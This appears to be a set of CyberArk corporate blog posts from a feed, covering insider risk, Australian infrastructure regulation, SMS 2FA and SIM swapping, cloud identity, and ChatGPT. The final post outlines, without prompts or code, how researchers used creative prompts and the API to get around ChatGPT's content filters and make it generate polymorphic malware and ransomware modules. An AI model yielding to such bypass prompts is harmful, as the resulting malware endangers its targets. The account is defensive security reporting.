The number of identities with access to sensitive data in your organization keeps growing, and increasingly, threat actors can count on two things. First, that someone with sensitive access will do something they shouldn’t, such as a business user who accidentally clicks on a link in a phishing email, a third-party contractor who falls for an MFA fatigue attack, a developer who hard codes credentials to save time or an IT admin who exposes troves of sensitive information after misconfiguring a cloud account. And second, that their victim’s organization isn’t equipped to stop or fix every snafu, every time.

According to Gartner®, Inc. estimates, lack of talent or human failure will be responsible for over half of significant cyber incidents by 2025.1

To Address Insider Identity Risks, Ask These Six Questions

As your organization looks inward, our CyberArk team recommends asking these six questions to help assess insider risks and ways to manage them better.

  • What assets matter most, and where do they live? As your IT infrastructure grows more extensive and complex, users work from everywhere, storing and accessing data in web applications, internal files, databases and services hosted on-premises and in the public cloud. You can’t effectively isolate and stop threats from reaching your company’s “crown jewels” without a clear understanding of what you need to protect and where these assets are stored.
  • Can we see how users are handling sensitive data? Based on CyberArk research, about 52% of the workforce identities in your company can access sensitive data. Yet like 48% of organizations today, you may have limited resources, visibility and control over how users are handling valuable and confidential assets. A consistent way to record, audit and protect end-user activity – particularly in web app and privileged sessions – is critical to quickly uncovering and mitigating insider threats.
  • Are we analyzing behavior to make more intelligent access decisions? According to Gartner, “A focused insider risk management program should proactively and predictively identify behaviors that may result in the potential exfiltration of corporate assets or other damaging actions and provide corrective guidance, not punishment.” 2Many security and compliance teams use AI to help contextualize user behavior data (for example, login date/time, device, location and privileged account use) and establish baselines for users across their access to web apps, resources and privileged accounts. This practice makes detecting risky behavior easier and gauging the likelihood of identity compromise – while enabling workers to operate without unnecessary disruption.
  • Are there ways we can improve the insider experience? University College London research suggests that the amount of effort required to do something influences what we think we see. In other words, people are likely to perceive challenging tasks – like repeated authentication prompts to access resources they regularly use – to be less appealing. And when the going gets tough, people take shortcuts and drive up insider risks. For some, this means storing files in Dropbox, sending information via personal email, sharing passwords or installing rogue applications – actions that may seem harmless, but can unintentionally put data and systems at risk.A 2022 Gartner survey found that 69% of employees have bypassed their organization’s cybersecurity guidance in the past 12 months, while 74% said they would be willing to bypass cybersecurity guidance if it helped them or their team achieve a business objective.3

    In CyberArk’s view, effective Identity Security anticipates and removes barriers, making it easy for people to do the right thing.

  • How do we bridge the cybersecurity expectation-reality gap? Overall awareness is up, and most people recognize that cybersecurity is everyone’s job, which is great and true. But that isn’t a defensible defense. Even if just 2.9% of employees click on phishing links (as the latest Verizon DBIR found), attackers still have plenty of opportunities to steal credentials and compromise identities. A Zero Trust philosophy assumes that humans will make mistakes. Instead of expecting that to change, it accounts for errors and how to minimize damage by promoting continuous authentication and authorization for all identities – human and machine – along with secure, least privilege access that’s granted just in time.
  • Are we tackling identity-based threats holistically? Organizations often use separate products to manage access for workforce and privileged identities, which require separate user and resource management and identity-related risk assessment. But without unified threat detection, a centralized source of data and standardized risk analysis and remediation policies, teams are more likely to miss, mishandle or respond too slowly to threats from both inside and outside.

You’ll need to gain stakeholder support to formalize insider threat protection as part of a broader Identity Security program. Convincing IT admins and other highly privileged users – who may initially resist scrutiny or change – is crucial. Another critical group to win over is leadership. Referencing current insider threat headlines can help frame the issue and drive a sense of urgency, while meaningful metrics are a must.

Because insider threats could be you, me or anyone else linked to an organization, intelligent privilege controls that were once designed for the most privileged user must now extend to every identity – enhancing visibility, detection and response, while maintaining the critical balance between security and usability.

1, 2, 3 – Gartner Press Release, “Gartner Predicts Nearly Half of Cybersecurity Leaders Will Change Jobs by 2025,” February 22, 2023. https://www.gartner.com/en/newsroom/press-releases/2023-02-22-gartner-predicts-nearly-half-of-cybersecurity-leaders-will-change-jobs-by-2025

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

]]>
Australia’s Growing Focus on Critical Infrastructure Cybersecurity in 2023 https://www.cyberark.com/blog/australias-growing-focus-on-critical-infrastructure-cybersecurity/ Wed, 26 Apr 2023 12:47:21 +0000 https://www.cyberark.com/?p=132143 australia critical infrastructure cybersecurity

In recent years, several major cyberattacks targeted critical infrastructure in Australia, including a major telecommunication company, which suffered a devastating data breach in September 2022. Soon after this cyberattack, Australia’s biggest health insurer also faced a ransomware attack in October 2022 that caused systems to go down. Customers could not access services through the company’s website or app.

These cyberattacks severely disrupted these organizations’ operational rhythms and required extra resources to manage the fallout.

They also occurred on a global stage featuring rising geopolitical tensions and increased interconnectivity of individual countries’ critical infrastructures. Escalating threats and cyberattacks on critical infrastructure are now more than ever a collective, global issue.

In the wake of last year’s major breaches, the Australian government is pursuing a new cybersecurity agenda. While these were far from the first attacks on Australia’s critical infrastructure systems, they emphasized the growing threat. Governments worldwide sprang into action to strengthen critical infrastructure resilience and information sharing – with Australia notably taking several significant steps designed to fortify its own critical infrastructure.

Australia’s Steps to Strengthen Critical Infrastructure

In response to the major security breaches that unfolded in 2022, the Australian government has pushed for critical infrastructure reforms in 2023. As part of this effort, Australia’s Home Affairs Minister Clare O’Neil stated the government will set up a new national office for cybersecurity within Home Affairs and begin consulting on a new seven-year cybersecurity strategy.

One of the recent outputs of Australia’s concerted effort to fortify its critical infrastructure is its 2023 Critical Infrastructure Resilience Strategy (the Strategy), which defines critical infrastructure (CI) as, “… those physical facilities, supply chains, information technologies and communication networks, which impact the social or economic well-being of the nation or affect Australia’s ability to conduct national defense and ensure national security.” This definition expands the scope of previously established critical infrastructure sectors.

Australia's Steps to Strengthen Critical Infrastructure

Australia’s critical infrastructure now consists of 11 defined sectors:

  • Communications
  • Financial services and markets
  • Data storage or processing
  • Defense industry
  • Higher education and research
  • Energy
  • Food and grocery
  • Healthcare and medical
  • Space technology
  • Transport
  • Water and sewerage

The scope of what’s officially considered to be critical infrastructure varies from country to country. Examples of the most critical assets to protect, however, typically include data assets, such as healthcare medical records or defense department classified materials – along with physical assets, such as energy control systems and water treatment facilities. All critical sectors rely on computerized operating technology (OT) to function, which is converging with IT and exposing critical industrial control system (ICS) endpoints and other assets to aggressive threats like ransomware.

Australia’s Security of Critical Infrastructure Act 2018 (SOCI Act) creates a framework for the regulation and protection of critical infrastructure sectors. As part of Australia’s Cyber Security Strategy 2020, the Australian government updated the SOCI Act and introduced critical infrastructure law reforms with the aim to further protect and improve the resilience of the country’s critical infrastructure. More than 18 months after its original announcement, the full package of reforms to the SOCI Act has been implemented with important implications for critical infrastructure sectors in Australia.

Australia is one of many governments and industry regulators around the world that have recently enacted cybersecurity mandates and guidelines to protect critical infrastructure. Meanwhile, the updated SOCI Act became effective on Feb. 17, 2023. The act mandates that infrastructure entities must take steps to adopt the critical infrastructure risk management program (CIRMP), by Aug. 17, 2023. These entities must also comply with ISO 27001, or an equivalent of a NIST standard by Aug. 18, 2024.

Here is a closer look at the key cybersecurity implementations that the Australian critical infrastructure community will be making in 2023:

  1. Strengthening the government’s own cybersecurity infrastructure by updating and modernizing the systems and technologies used to protect sensitive data and networks, as well as increasing the number of trained cybersecurity professionals within the government.
  2. Implementing new regulations and standards for businesses to improve their cybersecurity posture to protect their data and reduce the risk of cyberattacks.
  3. Developing national cybersecurity to foster clear communication and cooperation between different agencies, which is vital in the fast-moving world of cybersecurity.
  4. Improving the cybersecurity of critical infrastructure by working with businesses and organizations that operate critical infrastructure systems, such as power grids and transportation systems, to ensure they are properly secured is a central focus of 2023.
  5. Cooperating internationally to address cybersecurity challenges in building strong partnerships with other countries in this area.
  6. Recognizing the need for a greater focus on cybersecurity literacy and training in 2023.

Australia’s Expanding Attack Surface

Australia’s efforts come at a critical moment. According to the Australian Cyber Security Centre (ACSC), many of the cyber incidents reported between July 2021 and June 2022 were associated with Australia’s critical infrastructure or essential services. In the 2021–22 financial year, 95 cyber incidents (approximately 8% of all cyber incidents the ACSC responded to) affected critical infrastructure. Since the implementation of amendments to the SOCI Act in April 2022, the ACSC has notified multiple critical infrastructure entities of cyber incidents and vulnerabilities on their networks.

At the same time, a confluence of technology trends continues to expand the threat landscape, opening new avenues for critical infrastructure attackers to steal information, disrupt systems and, increasingly, threaten human safety:

IT/OT network convergence. To reduce expenses, simplify operations and support industrial internet of things (IIoT) initiatives, many IT and OT networks are converging. However, this eliminates the “air gap” that once separated these two environments, providing a pathway for external threat actors to gain access to industrial control systems.

Push to standards-based OT. Industrial control systems were once based on proprietary hardware and special-purpose software. In the current shift toward standards-based OT, many systems run on Linux-based commodity servers and leverage commercial-off-the-shelf (COTS) software, making them vulnerable to software supply chain attacks.

Widespread cloud adoption. Critical infrastructure operators are adopting Software as a Service (SaaS), Infrastructure as a Service (IaaS) and Platform as a Service (PaaS) solutions to accelerate the pace of innovation, streamline operations and support IoT programs like Smart Grid, Smart City and Smart Transportation systems. While essential to digital transformation, these cloud services also provide new ways for adversaries to penetrate systems.

Critical Infrastructure Cybersecurity Regulations

Governments and industry regulators have already enacted cybersecurity mandates and guidelines to protect critical infrastructure against cyberattacks.

Identity Security is an essential requirement for most of these regulations. Identity Security helps critical infrastructure operators defend against cyberattacks, drives operational efficiencies, satisfies regulatory requirements and provides evidence of compliance. To fulfill these requirements, critical infrastructure operators might need to:

  • Implement foundational controls to safeguard privileged access.
  • Monitor privileged access activity and promptly notify authorities of a security breach.
  • Demonstrate evidence of compliance to auditors on a regular basis.

Prioritizing Identity Security to Help Fortify Critical Infrastructure

Cybersecurity mandates and guidelines to protect critical infrastructure are becoming increasingly widespread. Many of these are grounded in a Zero Trust cybersecurity model, which assumes that all digital identities – human or machine – are implicitly untrusted and must be authenticated and authorized regardless of their network or location.

A Zero Trust approach protects modern operating environments by assuming all identities are implicitly untrusted and must be authenticated and authorized regardless of their network or location. Unlike a traditional perimeter-based security model, a Zero Trust architecture:

  • Protects cloud-based IT and OT systems as well as on-premises IT and OT systems.
  • Defends against inside threats as well as external threats.
  • Provides inherent security for remote workers and mobile users.

Unlike a traditional perimeter-based security model, a Zero Trust architecture centers on identity – and requires a comprehensive Identity Security solution and strategy to encompass cloud-based IT and OT systems as well as those on-premises; to defend against internal and external threats; and to provide inherent security for remote workers and mobile users.

Identity Security offers a robust set of unified access controls to enable Zero Trust. Given the transformational characteristics of critical infrastructure, Identity Security is the modern security paradigm shift that helps to protect it efficiently and effectively.

In establishing an Identity Security approach, critical infrastructure operators can apply more stringent controls by tracking identities and enabling security controls to be seamlessly applied, based on risk in real time.

If you’re looking for tips on assessing your organization’s current strategy and tackling identity-related risk, check out the CyberArk Blueprint for Identity Security Success, a vendor-agnostic framework for defining a roadmap for Identity Security success.

Thomas Fikentscher is CyberArk’s Regional Director for Australia and New Zealand.

]]>
Why Shutting Off SMS 2FA Makes Sense https://www.cyberark.com/blog/why-shutting-off-sms-2fa-makes-sense/ Fri, 21 Apr 2023 16:12:53 +0000 https://www.cyberark.com/?p=143026 Twitter’s SMS 2FA

Twitter’s recent decision to turn off SMS two-factor authentication (2FA) for non-Twitter Blue users created a stir. While media and tech pundits questioned the company’s motives, many users complained of losing a universal security measure behind a paywall. But all reasons and transition hiccups aside, “the residual benefit here is that it provides an opportunity to improve the security of Twitter’s userbase by migrating them to a more secure method of multi-factor authentication (MFA),” says CyberArk Labs offensive cybersecurity research evangelist Andy Thompson.

I asked Thompson to break down major SMS authentication risks and why more organizations will likely follow in Twitter’s footsteps. Here’s what he had to say.

An “Any 2FA Method Is Better Than None” Philosophy Won’t Protect Your Data

As consumers, we have plenty of opportunities to switch on SMS 2FA (which requires both a password and code sent by text to our phones) to help protect banking, social media, email and other online accounts. “Using any kind of MFA method is arguably better than using a password alone when it comes to personal use,” Thompson says. “But that doesn’t mean SMS authentication can adequately protect your data, and it certainly isn’t workable for complex enterprises that need to secure access for employees, vendors, partners and clients.”

In fact, SMS is one of the least secure MFA methods out there today. “Thanks to SMS 2FA, virtually every organization has been hit with a subscriber identity module (SIM) swapping attack at one point or another,” he says.

SIM Swapping Is Alive and Well

In a typical SIM swap, a threat actor obtains a victim’s personal data using phishing techniques, then uses this information to convince a mobile carrier to switch the number associated with a SIM card to another unauthorized device. Criminals often employ social engineering to do this, though rogue insiders are sometimes convinced to help. After this “swap,” all calls and texts to the victim’s number are re-routed to the attacker’s phone. By sending a “forgot password” or account recovery request for any account linked to the phone number, the attacker can obtain an SMS 2FA code, then use it to log in, change the password and control the account.

SIM swapping has been around forever. In 2019, former Twitter CEO Jack Dorsey’s own Twitter account was hijacked via SIM swapping. The following year, a SIM-swapping gang stole more than $100 million by targeting celebrities and online influencers. In 2022, the U.S. Federal Bureau of Investigations (FBI) issued its own warning, citing a record number of SIM-swapping complaints to its Internet Crime Complaint Center (IC3).

SMS Authentication Isn’t Cost-effective or Easy to Use

Though organizations from the National Institute of Standards and Technology (NIST) to Google have warned against using SMS 2FA for years, it remains a popular authentication method. “This doesn’t make much sense when you stop and think about it,” Thompson says. “From an end user perspective, SMS authentication is pretty clunky and inconvenient.”

It’s also expensive. Twitter reportedly spent $60 million a year combatting SMS texts from fake bot accounts. What’s more, companies are typically charged a fee for every SMS code that’s sent. This can add up quickly. “While I can’t speak for the company, these seem like reasons enough to drop this MFA option for free users. If you want Twitter to continue to support the backend of an insecure feature, you gotta pay for it,” Thompson says.

There’s also the potential cost of a breach to consider. Since it takes two to SIM swap (meaning an individual and a mobile carrier get scammed), who’s ultimately responsible for the damage? Thompson points to a notable legal case involving $24 million in stolen bitcoin. This month, a California judge ruled that the telecom provider was not liable for punitive damages. “Identity-based threats are evolving rapidly,” says Thompson. “This case further underscores the need for organizations to rethink their legacy MFA approaches and adopt modern alternatives that are built to outpace attackers and protect critical assets.”

Organizations Need More Adaptive Ways to Verify Identities Based on Levels of Access, Privilege and Risk

mfa 2fa security leaders

So where can organizations go from here? What can be done, for instance, when a threat actor has an employee’s login credentials and a clone of their mobile device? “This is where phishing-resistant secondary authentication factors such as a FIDO, QR codes, biometrics or physical tokens can make a big difference in thwarting attacks,” Thompson says. However, no MFA method is failsafe. He adds, “MFA fatigue attacks and other elaborate phishing schemes look for ways to bypass MFA of all kinds. And in these cases, the additional ability to analyze user behavior is critical for making smart, real-time access decisions.”

Unlike SMS 2FA, an adaptive MFA solution can learn from a user’s history of access habits, which enables it to discern typical behavior from risky activity. This allows the solution to ramp up or streamline authentication challenges based on real-time insights. The flexibility of this adaptive form of MFA provides a balance that takes care of job number one: protection. But it also prevents enhanced security measures from negatively impacting user experience.

“MFA has come a long way,” Thompson says. Putting forth a bottom line, he adds, “Let’s hope Twitter’s decision to retire SMS authentication inspires others to take this important step toward a safer, more secure digital future.”

David Puner is a senior editorial manager at CyberArk. He hosts CyberArk’s Trust Issues podcast.

For more insights from Andy Thompson, check out his CyberArk Trust Issues podcast dive into the latest developments in the world of ransomware.

]]>
Cloud Identity Security: It Doesn’t Taste Like Chicken https://www.cyberark.com/blog/cloud-identity-security-it-doesnt-taste-like-chicken/ Tue, 18 Apr 2023 19:27:49 +0000 https://www.cyberark.com/?p=142948

There’s a scene in the original “Matrix” movie when Neo is sitting in the grimy kitchen with the rest of the crew and eating gray, runny slop. No matter what new version of gray slop they eat, they always seem to think that it tastes like chicken.

When confronted with something new, it’s a natural human trait to relate it back to something we already know. I’ve had friends who have grown up exclusively with Western cuisine try tofu and described it as tasting like chicken. If you were to ask my grandmother, who was born and raised in China, what tofu tasted like, she would probably give you a quizzical look and simply state that tofu tastes like tofu.

The problem with this tendency to compare something new to something we’re familiar with (like chicken) is that it can cause us to make a lot of false assumptions – for instance, you might assume tofu is animal-based rather than plant-based.

When we think about cloud Identity Security, we have to work hard to put aside our natural human tendency to instantly equate it with something we already know, or we could end up working off of those false assumptions. In the case of Identity Security, security teams may at first consider cloud to “taste like” the on-premises infrastructure that they’re used to. But cloud infrastructure is entirely different (think back to plant-based tofu versus animal-based chicken), and we must think about the cloud for what it is versus try to fit it in a box from our previous experience in order to design proper security controls. Otherwise, those false assumptions could lead to flawed security architectures and increase the risk of potential cyberattacks.

So let’s take a look at what cloud security is, instead of trying to relate it back to what has been done for on-premises infrastructure. Along the way, we’ll consider the two types of identities – human and non-human – since they each have vastly different access requirements.

The Great Identities Divide: Humans and Non-humans

Human identities (employees, vendors and maybe even customers) are relatively stable and well-known. Human scalability is limited; after all, there’s a limit to how fast a person can type or click. However, human access use cases vary greatly by role and circumstance. For instance, under normal circumstances, a developer may not be allowed access into a production environment, but if there’s an outage, the access level may be elevated to “read all/write all” to allow them to quickly traverse the entire environment to diagnose and resolve the issue. Human individuals can also assume different access roles for various reasons – an individual covering for a teammate out on paternity leave or transferring to another department or receiving a promotion.

Non-human identities (services, microservices or machine identities) are in many ways the polar opposite. Service containers and virtual machines (VMs) are highly dynamic and ephemeral through autoscaling. Service scalability can vary from thousands to extremes of millions of transactions per second. However, non-human service behaviors and access are highly programmatic and predictable. Services never have to cover for another service that has a family emergency, and, during an outage, the human’s task is to diagnose why some service or set of services isn’t behaving exactly like it’s supposed to.

These and many other differences drive us to think about securing the identity of human and non-human access very differently.

Human Cloud Access Considerations

The bottom box of the image below shows the three layers of a cloud environment that are within the control of an organization. The top box depicts SaaS applications in someone else’s cloud that are outside the organization’s control.

  • IN the cloud depicts all the native services that are provided by the cloud service providers (CSPs). Each of the three major CSPs now have hundreds of services and provide granular native controls to each of those services. However, users have standing (always-on) access and entitlements, which creates exposure to a range of security issues. Companies with multi-cloud environments have compounded issues as they are managing access in multiple CSPs.
  • ON the cloud depicts workloads that organizations build and deploy on top of the CSP’s cloud. All CSPs preach a shared security model which puts the onus of securing workloads ON the cloud on the organization. These workloads could be wholly contained as a single service running in a container or an entire legacy application in a VM. These workloads take advantage of one of the core values of the cloud: elastic compute, which auto-scales fleets of instances up and down based on demand. However, this creates a problem for anyone who wants to peek inside a VM at any given moment to diagnose an issue because it’s impossible to laboriously register every ephemeral VM that comes and goes with a fixed access control list.
  • IN the VM ON the cloud describes a possible third layer that could range from a light Java app to a heavyweight legacy independent software vendor (ISV) application. Each of these workloads, of course, has its own security model.

Lastly, every organization uses SaaS applications, whether it be a business application or a technical application. The SaaS vendors each have their own security access method outside the control of the organization. However, the organization still has the need to monitor the activities of the admin for those SaaS apps in case of malicious activity.

Non-human Cloud Access Considerations

Non-human identities, on the other hand, typically use secrets to communicate to each other and to access critical resources. Secrets are credentials like passwords, API keys, SSH keys and the like. There are two sides of the coin when it comes to managing secrets in the cloud for non-human access.

On one side, organizations have to manage the secret itself. This means managing the myriad types of secrets (token, public/private keys, certificates and more) as well as industry or internal rules such as rotation intervals in order to stay in compliance. However, doing this in the cloud in a consistent manner becomes complicated in a multi-cloud environment and with the reality of open-source vaults.

On the other side of the coin, organizations must control access to the secrets, since these secrets are used by each target system to govern how each of the disparate systems talk to one another. A mishmash of control points spread out across each system is clearly inefficient and cumbersome. It’s obvious that a central hub to control access to the secrets is the most logical solution.

Secure Access to the Layers of the Cloud

Securing access to the cloud is challenging. As you build cloud security controls, make sure you don’t fall into the trap of equating it to on-premises infrastructure; remember, tofu tastes like tofu. Instead, consider a robust cloud Identity Security program that accounts for all of these layers of infrastructure independent of an on-premises mental model. A holistic pragmatic approach to improve cloud security will help both digital-native businesses and enterprises lifting and shifting legacy workloads secure access to the cloud for humans and non-humans.

To learn more about how you can take a phased approach to build a pragmatic cloud Identity Security program, check out my next piece, “Why Cloud Identity Security Seems So Hard.”

Charles Chu is the general manager of Cloud Security at CyberArk.

]]>
ChatGPT’s Role in the Evolution of Application Development https://www.cyberark.com/blog/chatgpts-role-in-the-evolution-of-application-development/ Tue, 11 Apr 2023 11:05:51 +0000 https://www.cyberark.com/?p=142794 AI chatbot app development

When I wrote my first applications in high school, coding was a lot more time-consuming. I didn’t have libraries I could shop through with ready-made bits of code to drop in to save myself time or bridge the gap between the pieces of code I could write to create something more complex. Instead, I had to write everything from scratch. If I wanted to include any kind of image, I would have to draw it with mathematical coordinates, which took a ton of time. It’s almost like programming via Etch-a-Sketch. A friend of mine who spent hours creating a video game for a school project could only use stick figures, but our teacher thought the end product didn’t look very appealing, not realizing how much time and effort creating those stick figures took.

As I’ve moved forward in my career, other developers and I have been able to write more complex applications. Part of that was due to our growing expertise as we learned more. But part of that has also been thanks to the new technology that’s sprung up in the intervening years to make it easier to code faster and build more advanced applications than ever before. And now we’ve got the newest piece of technology here to help: ChatGPT and other AI-powered tools that can write simple blocks of code for developers, in whatever programming language they need.

But as these new tools are used more frequently and at a larger scale, there are important cybersecurity implications. Developers will need to be educated about cybersecurity best practices to ensure that the code produced by these AI-powered tools is secure and not accidentally introducing vulnerabilities. Instead of taking work away from developers, tools like ChatGPT will require them to learn new skillsets when it comes to cybersecurity – because at the end of the day, the human is the one accountable for the code, no matter what machine produces it.

The Evolution of Technology for Application Development

One of the things I love most about software development is that it’s in a constant state of evolution. As a developer, you’re always looking for ways to be more efficient and not write the same code twice – the old mantra of “don’t repeat yourself.” Humans have always tried to find ways to automate mundane, repeatable tasks. Just think of what solutions like TurboTax have done for tax season – just plug in a few pieces of data and boom, your taxes are done. From a developer’s perspective, when we’re able to take out that repetitive lower-level coding work, we can build better, more complex applications.

AI bots like ChatGPT aren’t the first piece of technology that has helped us do that. Instead, they’re merely the next step in the evolution of app development, building off what’s come before.

“Instead of taking work away from developers, tools like ChatGPT will require them to learn new skillsets when it comes to cybersecurity – because at the end of the day, the human is the one accountable for the code, no matter what machine produces it.”

One of the first experiences I had with a tool that helped make my coding life easier so I could focus on higher-level tasks was WYSIWYG (“what you see is what you get,” pronounced “wiz-ee-wig”), which I started using as a developer at IBM. WYSIWYG is a type of low-code/no-code software that allows you to create and edit elements that you need while showing them to you in their final form. For instance, say I need a button for my app. Think about that high school example, where I had to map images out with mathematical coordinates. With a WYSIWYG tool, I can instead create the button in its final form and then tweak as I need to in the tool, resizing it or adding text. Meanwhile, in the background, it creates lines of code that I can then drop into whatever application I’m working on, but in the tool itself, I just see the button. What you see is what you get. You can see how a tool like that would make things easier for app developers. I could spend less time coding buttons and more time on advanced functionality.

Another step in the evolution of coding technology is something called object-oriented programming (OOP). With OOP, people write basic modules of an application (“objects”) that contain data and code. Then as a developer, I can pull multiple pre-written objects together to create my own application. This saves developers time from having to write the same thing over and over again. Instead, you can grab the right objects as you need them, drop them in and move on.

ChatGPT: No More Googling Required?

Before AI-powered tools like ChatGPT, if I were looking for how to write some code in a certain language to perform a particular task, I’d head to Google. There, I’d usually find numerous answers from forums like Stack Overflow, which I’d sift through. There might be multiple answers from different sources that I’d have to compare until I landed on the one I wanted to use.

But as you can see in the image below, with ChatGPT, I don’t have to sift through multiple answers. Instead, I specify the programming language I’m working in and what I need the code to do, and it will serve me up what it believes to be the best answer. You can see how this saves time for developers. ChatGPT can write the code out faster than humans can type, which means less code for you, the developer, to write. By saving you from the mundane “boilerplate” type of development work, ChatGPT frees up developers to focus on higher-level concepts. The result? More advanced apps and faster development cycles.

chatgpt coding language

 

There’s Always a Catch

Notice how I said ChatGPT serves up what it believes to be the best answer? Therein lies the catch for using an AI tool, and it’s the same challenge that comes with using any prebuilt code. Just because ChatGPT gives you one answer instead of the several you’d find by searching the old-fashioned way doesn’t necessarily mean it’s the best answer. This is a tool that’s still in the beta stage, after all. Developers should still evaluate and cross-check the code that ChatGPT serves up before using it in any application.

There are plenty of examples of breaches that started thanks to someone copying over code and not checking it thoroughly. Think back to the Heartbleed exploit, a security bug in a popular library that led to the exposure of hundreds of thousands of websites, servers and other devices that used the code.

Because the library was so widely used, the thought was that, of course, someone had checked it for vulnerabilities. But instead, the vulnerability persisted for years, quietly used by attackers to exploit vulnerable systems.

And that is the darker side to ChatGPT: attackers also have access to the tool. While OpenAI has built some safeguards into the tool to prevent it from answering questions regarding problematic subjects like code injection, the CyberArk Labs team uncovered some ways in which the tool could be used to create polymorphic malware. Even if these types of activities are safeguarded against as OpenAI continues to refine the tool, attackers can still use it the same way regular developers can – to cut down on manual coding time and produce malicious code faster than they could before.

Always Verify

So, just like so much else in the cybersecurity space when it comes to technology, the solution is to always verify. Developers will have to cross-check the code that ChatGPT provides with other sources to ensure there are no unintentional vulnerabilities or errors within. Because they don’t have the guardrails of peer review that they used to have, developers have to take accountability for the machine-written code. They will have to educate themselves on cybersecurity best practices and work with their security teams to ensure they can appropriately validate any machine-written code. At the end of the day, though these tools are helpful, the human using the tools is the one responsible for what is produced; the machine isn’t the one that will get sued or disciplined if something goes wrong and the organization is breached. But as long as developers take the time to evaluate the answers that ChatGPT provides and follow cybersecurity best practices, it and other AI-powered tools like it can help software development reach new heights.

John Walsh is a senior product marketing manager at CyberArk.

]]>
AI, ChatGPT and Identity Security’s Critical Human Element https://www.cyberark.com/blog/ai-chatgpt-and-identity-securitys-critical-human-element/ Thu, 06 Apr 2023 16:11:38 +0000 https://www.cyberark.com/?p=142741 Tech graphic of brain neurons

In 1999, a far-fetched movie about a dystopia run by intelligent machines captured our imaginations (and to this day, remains my favorite film). Twenty-four years later, the line between fact and fiction has all but vanished and the blockbuster hits much differently. Are we entering the Matrix? Are we already in it? Can anyone be sure?

While robot overlords haven’t materialized (yet), modern life is inseparable from artificial intelligence (AI) and machine learning (ML). Advanced technology works behind the scenes when we search Google, unlock our phones with our faces, shop for “recommended items” online or avoid traffic jams with our trusty travel apps. AI/ML’s role in personal and professional life has expanded rapidly in recent years but it wasn’t until ChatGPT arrived in November 2022 that we reached a tipping point.

The New York Times’ Thomas L. Friedman describes the AI chatbot’s impact as “Promethean,” comparing this moment in history to when Dorothy enters the magical Land of Oz and experiences color for the first time in “The Wizard of Oz.” He writes that ChatGPT is “such a departure and advance on what existed before that you can’t just change one thing, you have to change everything.” For better and for worse.

In the Fifth Domain of Cyberspace, AI/ML Benefits Both Sides

My own AI “ah-ha moment” happened at DEFCON 24 back in 2016 as I watched autonomous cyber reasoning systems (CRSs) go head-to-head with each other, finding hidden vulnerabilities in code and deploying patches to fix them without any human assistance. It was clear that AI/ML would fundamentally change the way organizations did cybersecurity. Since then, we’ve experienced game-changing innovations that enable us to analyze massive quantities of data and accelerate response times.

Most important, AI/ML-fueled scalability, speed and continuous self-learning are a boon to resource-strained cybersecurity teams. As 3.4 million global industry jobs remain vacant, many security leaders welcome new opportunities to bridge gaps and amplify efforts. For instance, many are turning to AI-powered tools to simplify cumbersome authentication processes. Adaptive multi-factor authentication and single sign-on methods use behavioral analytics to verify identities based on levels of access, privilege and risk – without slowing users down. And as hybrid and multi-cloud environments continue to grow in complexity, teams are automatically managing permissions for the thousands (or even millions) of identities across their cloud estates with the help of AI.

ChatGPT is another valuable tool in defenders’ toolboxes. According to research from The Wall Street Journal, security teams have charged ChatGPT with creating easy-to-understand communications materials that resonate with business stakeholders and help build program support. Others use it to create policy templates that humans can customize. But most early ChatGPT cybersecurity use cases focus on task automation, from log file analysis and threat trend mapping to vulnerability detection and secure coding support for developers.

While AI continues to evolve, it has limitations, and it cannot bring the cognitive reasoning, nuance and critical first-hand experience that human subject matter experts can. For instance, a University of California, Los Angeles neuroscientist recently asked ChatGPT’s latest version, ChatGPT-4, “What is the third word of this sentence?” The bot’s answer was “third.” Another example: SC Magazine featured a study of 53,000 email users in more than 100 countries, revealing that phishing emails created by professional red teamers drove a 4.2% click rate compared to ChatGPT-created campaigns that lagged at just 2.9%.

In a recent ABC News interview, Sam Altman, CEO of OpenAI (the company that created ChatGPT), urged people to view the chatbot as a supplementary tool rather than a replacement for human experts, saying that “humanity has proven that it can adapt wonderfully to major technological shifts.”

Research on GPT by BlackBerry

Unfortunately, threat actors are also adapting and harnessing AI/ML for many of the same reasons cybersecurity teams are.

Threat researchers have already exposed numerous ways ChatGPT could be used for nefarious purposes. Our own CyberArk Labs team demonstrated how easy it is to create polymorphic malware – sophisticated malware that can evade security protections and make mitigation difficult – utilizing ChatGPT. CyberArk researchers found ways to circumvent built-in content filters (checks designed to prevent abuse and malicious activity) by experimenting with creative prompts. They coaxed ChatGPT into generating (and continuously mutating) code for injection, as well as creating file searching and encryption modules needed to spread ransomware and other malicious payloads. They also discovered that by using ChatGPT’s API with a specific prompt they could bypass all content filters completely.

Fellow researchers at Check Point Research analyzed several underground communities to discover ChatGPT use cases for creating infostealer malware, designing a multi-layered encryption tool (without any prior experience, according to the threat actor’s description) and launching an automated dark web marketplace for illicit goods.

Altman acknowledged the risks that fast-morphing AI/ML technology bring in the previously mentioned interview. “I’m particularly worried that these models could be used for large-scale disinformation,” he said. “Now that they’re getting better at writing computer code, [they] could be used for offensive cyberattacks.”

IT decision-makers share Altman’s concerns. According to a 2023 Blackberry Global Research study, 51% believe a successful cyberattack will be credited to ChatGPT within the year. Most concerning to respondents is the chatbot’s ability to aid threat actors in crafting more believable and legitimate-sounding phishing emails (53%). This highlights the need for robust endpoint security that encompasses everything from strong endpoint privilege management to regular cybersecurity awareness training to help end-users spot common phishing and social engineering tricks. Respondents also expressed worry that less-experienced attackers could use AI to improve their knowledge and skills (49%) and about AI spreading disinformation (49%).

AI apprehension continues to mount. In late March, an open letter featuring more than 1,100 prominent signatories called for “all AI labs to immediately pause for at least 6 months the training of AI systems more powerful than GPT-4” until regulators can catch up. Just two days after the letter was published, Italy temporarily banned ChatGPT and is now investigating potential violations of both the EU’s General Data Protection Regulation and the Italian Data Protection Code. In many other countries, lawmakers are sounding the alarm about emerging security and privacy issues. According to NPR, the Center for AI and Digital Policy filed a complaint with the U.S. Federal Trade Commission in late March describing ChatGPT-4 as having the ability to “undertake mass surveillance at scale.”

Identity Security’s Critical Human Element

As public debate and regulatory scrutiny around AI/ML intensify, enterprise cybersecurity teams should stay vigilant without losing sight of the bigger picture. That is, that cyberattacks are inevitable – no matter how, where or why they originate. But damage is not.

